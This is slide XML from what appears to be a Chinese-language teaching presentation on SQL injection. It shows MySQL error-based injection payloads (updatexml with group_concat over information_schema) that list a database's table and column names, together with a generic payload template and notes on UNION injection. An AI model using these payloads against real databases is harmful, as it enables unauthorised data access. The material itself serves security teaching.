              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                     from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>='xxx')),1))#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CE0771-801F-4917-8CDA-5EAF7F65BC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425606" y="4115556"/>
            <a:ext cx="1287217" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4085A5-1EFA-48EA-B83B-663BC9F83052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466507" y="5552699"/>
            <a:ext cx="12168039" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(1,concat('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                     from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>='xxx')),1))#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05D9CB4-B27F-45BF-A756-CECD93F2D04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380354" y="5225508"/>
            <a:ext cx="1287217" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47C2D0F3-E1FF-4906-A2C4-94E204F201F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146693" y="1781219"/>
            <a:ext cx="13379171" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>'and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>("anything",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)),"anything"))#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F258EDA2-44E9-47A5-A88C-A4F0216D87F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4881061" y="2308882"/>
            <a:ext cx="6978642" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'~'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以换成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等不满足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>格式的字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1920920922"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3CF56B-58C1-4505-87D7-4E2CD0C94ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955130" y="2070577"/>
            <a:ext cx="4193920" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
